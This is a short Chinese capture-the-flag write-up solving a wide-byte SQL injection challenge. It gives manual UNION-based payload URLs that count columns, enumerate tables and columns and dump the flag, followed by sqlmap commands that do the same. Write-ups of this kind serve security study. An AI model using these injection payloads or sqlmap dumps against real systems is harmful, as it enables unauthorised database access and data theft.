ctf:有趣的注入
(一)手注:
url:http://ctf.cdusec.org:8086/sqli.php?id=1
实验工具:火狐hackbar
x001:
输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。)
截图:
x002判断列数:判断出来有3列。
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 4 -- +
x003判断注入点:
http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,3 -- +
x003:查询table
http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- +
x004:查询columns。
子查询:
使用单引号,双引号等被注释掉,最后用子查询查到。culumns
http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,4))--+
x005:查询dump
http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,flag from flag--+
x005:
flag:
flag{Just_4_b4by_SQLi}
(二)slqmap跑:
x001:dbs
sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" --dbs
x002:tables
sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news --tables
x004:dump
sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news -T flag --dump